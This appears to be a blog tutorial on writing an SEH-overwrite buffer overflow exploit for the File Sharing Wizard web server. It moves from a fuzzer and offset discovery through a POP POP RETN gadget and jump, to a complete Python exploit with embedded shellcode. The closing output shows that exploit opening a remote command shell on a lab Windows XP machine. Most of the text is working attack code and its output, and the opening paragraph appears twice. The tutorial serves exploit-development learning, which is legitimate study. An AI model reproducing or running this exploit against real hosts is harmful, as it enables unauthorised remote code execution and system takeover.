SEH Based Buffer Overflow
This time I will tell you about buffer overflow that occurs in the File Sharing Wizard application, this firs time I learn about buffer overflow.
we'll get a buffer overflow when we send to that aplication 2000 bytes of data, this the sample fuzzer with python :
whit that fuzzer aplication will crash but EIP not overwrite bicause this aplication protected whit SEH, we can see that with SEH chain menu in debugger :
After we know that, now look at how many byte SEH overwriting ? and we can use pattern_create.rb to create 2000 string. pattern_create.rb can be found in metasploit folder :
root@bt:/pentest/exploits/framework/tools# ruby pattern_create.rb 2000
we'll get a buffer overflow when we send to that aplication 2000 bytes of data, this the sample fuzzer with python :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "A" * 2000
print "[!] Launching Remote BoF on", ips,",hang on tight!"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()
whit that fuzzer aplication will crash but EIP not overwrite bicause this aplication protected whit SEH, we can see that with SEH chain menu in debugger :
After we know that, now look at how many byte SEH overwriting ? and we can use pattern_create.rb to create 2000 string. pattern_create.rb can be found in metasploit folder :
root@bt:/pentest/exploits/framework/tools# ruby pattern_create.rb 2000
that command will generate 2000 string that we can use it for fuzzer, like this :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
print "[!] Launching Remote BoF on", ips,",hang on tight!"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()
Execute that fuzzer and we will get this in our debuger :
To know how many byte 42386942 we can use pattern_offsec.rb :
root@bt:/pentest/exploits/framework/tools# ruby pattern_offset.rb 42386942
1044
Now we must look for POP POP RETN to overwrite EIP that protected with SEH, we can found that in executable modules and only modules there are not protected with SEHandler can be used. we can ceck it whith msfpescan . for this aplication I use modul libeay32.dll and this POP POP RETN in that modul :
that command in address 74D31567 , now we put that addres in our fuzzer in byte 1044 to overwrite SEH protection whit litle endian format, this our fuzzer after modified :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "\x41" * 1000
string+= "\xCC" * 44
string+= "\x67\x15\xD3\x74"
string+= "\x41" * (2000-len(string))
print "[!] Launching Remote BoF on", ips,",hang on tight!"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()
wow.... after pop pop retn executed in four rows is string CC this our packet. we must jump of fiveth row whicth pop pop retn addres.and this fuzzer after modified :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "\x41" * 1000
string+= "\xCC" * 40
string+= "\xeb\x06\x90\x90"
string+= "\x67\x15\xD3\x74"
string+= "\x41" * (2000-len(string))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()
I put "\xeb\x06\x90\x90" in byte 1040-1044 for jump to 6 byte from that location bicause in byte 1045-1048 containing POP POP RETN addres. Now we set payload in bytes after 1044 contain
string A or 41 in hexa :
import socket
import sys
ips = '192.168.56.101'
port = 80
string = "\x41" * 1000
string+= "\xCC" * 40
string+= "\xeb\x06\x90\x90"
string+= "\x67\x15\xD3\x74"
string+=("\xda\xc7\x31\xc9\xb1\x51\xd9\x74\x24\xf4\xbf\x69\xf7\x14\xfe\x5a"
"\x31\x7a\x17\x03\x7a\x17\x83\x83\x0b\xf6\x0b\xaf\x9e\x1c\xbe\xa7"
"\xa6\x1c\xbe\xc8\x39\x68\x2d\x12\x9e\xe5\xeb\x66\x55\x85\xf6\xee"
"\x68\x99\x72\x41\x73\xee\xda\x7d\x82\x1b\xad\xf6\xb0\x50\x2f\xe6"
"\x88\xa6\xa9\x5a\x6e\xe6\xbe\xa5\xae\x2d\x33\xa8\xf2\x59\xb8\x91"
"\xa6\xb9\x69\x90\xa3\x49\x36\x7e\x2d\xa5\xaf\xf5\x21\x72\xbb\x56"
"\x26\x85\x50\x6b\x7a\x0e\x2f\x07\xa6\x0c\x51\x14\x97\xf7\xf5\x11"
"\x9b\x37\x7d\x65\x10\xb3\xf1\x79\x85\x48\xb1\x89\x8b\x26\xbc\xc7"
"\x3d\x5b\x90\x28\x97\xc5\x42\xb0\x70\x39\x57\x54\xf6\x4e\xa5\xfb"
"\xac\x4f\x19\x6b\x86\x5d\x66\x50\x48\x61\x41\xf9\xe1\x78\x08\x84"
"\x1f\x8a\xd7\xd3\xb5\x89\x28\x0b\x21\x57\xdf\x5e\x1f\x30\x1f\x76"
"\x33\xec\x8c\x25\xe7\x51\x60\x8a\x54\xa9\x56\x6a\x33\x44\x0b\x14"
"\x90\xef\x52\x4d\x7e\x54\x8e\x1d\xb8\xc3\x50\x0b\x2c\xfc\xff\xe6"
"\x4e\x2c\x97\xac\x1c\xe3\x81\xfb\xa1\x2a\x02\x56\xa1\x03\xcd\xbd"
"\x14\x22\x47\x6a\x58\xfc\x08\xc0\xf2\x54\x56\x38\x69\x3e\x4f\xc1"
"\x48\xc6\xd8\xce\x83\x6c\x18\xe0\x4a\xe5\x82\x66\xfb\x9a\x27\xef"
"\x1e\x36\xe8\xb6\xc9\x0b\x81\xaf\x60\xd0\x1b\xcd\x44\x18\xe8\xbb"
"\x59\xda\x22\x45\xe7\xf7\xaf\x34\x92\x3f\x7b\xed\xc8\x28\x09\x0f"
"\xbd\xbf\x12\x9a\x86\x40\x3a\x3f\x50\xed\x92\xee\x0f\x7b\x14\x41"
"\xe1\x2e\x47\x9e\xd1\xb9\xca\xb9\xd7\xf7\x46\xc6\x0e\x6d\x96\xc7"
"\x98\x8d\xb8\xbc\xb0\x8d\xba\x06\x5a\x91\x6b\xd4\x5c\xbd\xfc\xa6"
"\x7a\xdc\x8e\x05\x84\xf7\x8e\x79")
print "[!] Launching Remote BoF on", ips,",hang on tight!"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "[-] Oops! Cannot establish connection..\r\n"
sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)
s.send(payload)
s.close()
After fuzzer executed the aplication not crahs, but exploit stil running :
root@bt:~/Desktop/tes# python fswizard-skeleton.py
[!] Launching Remote BoF on 192.168.56.101 ,hang on tight!
[*] Sending evil payload..
[*] Done! Check your debugger..
root@bt:~/Desktop/tes# telnet 192.168.56.101 4444
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim>
Comments
Post a Comment